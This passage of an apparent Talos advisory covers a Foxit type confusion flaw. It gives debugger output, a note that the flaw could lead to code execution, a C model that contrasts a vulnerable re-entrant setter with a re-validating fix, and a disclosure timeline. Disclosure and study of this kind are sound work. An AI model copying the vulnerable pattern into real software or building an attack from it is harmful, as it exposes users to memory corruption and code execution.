2f 072ffcf0 00000000     03e66017 071fb000 00000000 ntdll!_RtlUserThreadStart+0x1b

In the above debugger output, the crash occurs when esi is dereferenced as if it were an object pointer. Depending on the memory layout of the process, arbitrary read and write access may be possible, which could ultimately be abused to achieve arbitrary code execution. Additionally, it should be noted that this vulnerability is very similar to a previously reported type confusion vulnerability that was tracked as CVE-2023-32664 and TALOS-2023-1795.
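The following is an added model of the bug class described above (a re-entrant script callback replacing an object whose type was validated only once), written for this report and not taken from Foxit's code. Structure names, member names and the generation counter are assumptions; only the type-tag values, the offset 0x0c read and the "Ribbon_Category_PostScanOptions" contents come from the trace. The vulnerable setter returns the confused word instead of dereferencing it, and the hardened setter shows the re-validation a fix needs.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Type tags per the advisory: the first 4 bytes hold 1 (Push Button), 2 (Radio Button) or 3 (Check Box). */
enum field_type { FIELD_PUSH_BUTTON = 1, FIELD_RADIO_BUTTON = 2, FIELD_CHECK_BOX = 3 };
/* Assumed Radio Button layout (32-bit words so offsets match the trace); the
   setter treats the word at offset 0x0c as an object pointer ([6]/[7]). */
struct radio_button {
    uint32_t type;        /* offset 0x00 */
    uint32_t flags, pad;  /* offsets 0x04, 0x08 */
    uint32_t value_ref;   /* offset 0x0c: word the setter dereferences */
};

/* Assumed layout of the string that reuses the freed block: its characters start at offset 0x0c, as at [5]. */
struct string_obj {
    uint32_t header, length, capacity;  /* offsets 0x00..0x08: no type tag here */
    char data[32];                      /* offset 0x0c: ASCII bytes, not a pointer */
};

/* The block is freed and reallocated at the same address during the callback; the union models that reuse. */
union field_storage { struct radio_button rb; struct string_obj str; };
struct document {
    union field_storage *field;  /* the "Radio Button0" object */
    int calculate_action_set;    /* 1 when txt5 carries a Calculate action */
    uint32_t generation;         /* bumped whenever the field table is rebuilt */
};

/* Model of the Calculate action calling deletePages(): the field is torn down and its memory reused. */
static void run_calculate_action(struct document *doc) {
    if (!doc->calculate_action_set) return;
    memset(doc->field, 0, sizeof *doc->field);
    doc->field->str.header = 0x371936e0u;  /* constructed pointer-like word, as seen at [5] */
    doc->field->str.length = doc->field->str.capacity = 31;
    strcpy(doc->field->str.data, "Ribbon_Category_PostScanOptions");
    doc->generation++;
}

/* Reads the word at offset 0x0c exactly as the setter does, whatever the block now holds. */
static uint32_t word_at_0x0c(const union field_storage *block) {
    uint32_t w;
    memcpy(&w, (const char *)block + 0x0c, sizeof w);
    return w;
}

/* Vulnerable pattern: check the tag once, run script, then keep using the original pointer with the
   Radio Button layout. The confused word would fault on dereference (the div at the crash site), so the model returns it. */
static uint32_t set_value_unchecked(struct document *doc) {
    union field_storage *rb = doc->field;
    if (rb->rb.type != FIELD_RADIO_BUTTON) return 0;
    run_calculate_action(doc);   /* re-entrant script runs here */
    return word_at_0x0c(rb);     /* "Ribb" = 0x62626952 once the string occupies the block */
}

/* Hardened pattern: snapshot the generation before running script and re-check it and the type tag
   afterwards. Returns 0 without touching offset 0x0c when the object was invalidated, else 1. */
static int set_value_checked(struct document *doc, uint32_t *out) {
    union field_storage *rb = doc->field;
    uint32_t gen = doc->generation;
    if (rb->rb.type != FIELD_RADIO_BUTTON) return 0;
    run_calculate_action(doc);
    if (doc->generation != gen || rb->rb.type != FIELD_RADIO_BUTTON) return 0;
    *out = word_at_0x0c(rb);
    return 1;
}

/* Builds a fresh Radio Button whose offset-0x0c word is value_ref (a constructed value). */
static void init_radio_button(struct document *doc, union field_storage *block, uint32_t value_ref, int action_set) {
    memset(block, 0, sizeof *block);
    block->rb.type = FIELD_RADIO_BUTTON;
    block->rb.value_ref = value_ref;
    doc->field = block;
    doc->calculate_action_set = action_set; doc->generation = 0;
}

int main(void) {
    static union field_storage block;
    struct document doc; uint32_t v = 0;
    init_radio_button(&doc, &block, 0x22af8800u, 1);
    printf("unchecked setter would dereference 0x%08x\n", set_value_unchecked(&doc));
    init_radio_button(&doc, &block, 0x22af8800u, 1);
    printf("checked setter accepted: %d\n", set_value_checked(&doc, &v));
    return 0;
}
```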

TIMELINE

2023-09-18 - Vendor Disclosure
2023-11-22 - Vendor Patch Release
2023-11-27 - Public Release

Credit

Discovered by Kamlapati Choubey of Cisco Talos.